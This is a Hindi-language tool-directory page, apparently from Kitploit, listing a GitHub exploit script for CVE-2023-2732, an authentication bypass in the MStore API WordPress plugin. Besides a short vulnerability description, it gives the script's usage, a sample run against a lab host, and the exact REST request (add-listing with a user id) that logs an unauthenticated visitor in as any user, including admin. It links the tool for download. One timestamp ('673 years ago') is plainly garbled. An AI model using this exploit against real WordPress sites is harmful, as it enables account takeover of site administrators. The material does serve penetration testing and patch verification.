Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-2732 — MStore API <= 3.9.2 - प्रमाणीकरण बाईपास | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2023-2732
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2023-2732

CVE-2023-2732

MStore API <= 3.9.2 - प्रमाणीकरण बाईपास

रिपॉजिटरी देखें
673 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-2732

MStore API <= 3.9.2 - प्रमाणीकरण बाईपास

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mstore-api/mstore-api-392-authentication-bypass

विवरण

root@kitploit:~
MStore API प्लगइन WordPress के लिए संस्करण 3.9.2 तक (और इसमें शामिल) प्रमाणीकरण बाईपास के प्रति संवेदनशील है। यह प्लगइन द्वारा add listing REST API अनुरोध के दौरान प्रदान किए गए उपयोगकर्ता के अपर्याप्त सत्यापन के कारण है। इससे अप्रमाणित हमलावरों के लिए साइट पर किसी भी मौजूदा उपयोगकर्ता, जैसे कि व्यवस्थापक, के रूप में लॉग इन करना संभव हो जाता है, यदि उनके पास उपयोगकर्ता आईडी तक पहुंच हो।

सहायता

root@kitploit:~
usage: mstore-api.py [-h] -u URL

options:
  -h, --help         सहायता संदेश दिखाएँ और बाहर निकलें
  -u URL, --url URL  WordPress साइट का URL

उपयोग उदाहरण

root@kitploit:~
python3 mstore-api.py -u http://wordpress.lan


प्लगइन संस्करण 3.9.3 से नीचे है।
एक उपयोगकर्ता चुनें:
1. admin
उपयोगकर्ता आईडी दर्ज करें: 1



बधाई हो, एक संवेदनशील सिस्टम मिल गया है।

शोषण कैसे करें:

निम्नलिखित URL पर जाएँ: http://wordpress.lan/wp-json/wp/v2/add-listing?id=1
http://wordpress.lan पर जाएँ और आपको अपने चुने हुए उपयोगकर्ता के रूप में लॉग इन हो जाना चाहिए।
टूल डाउनलोड करें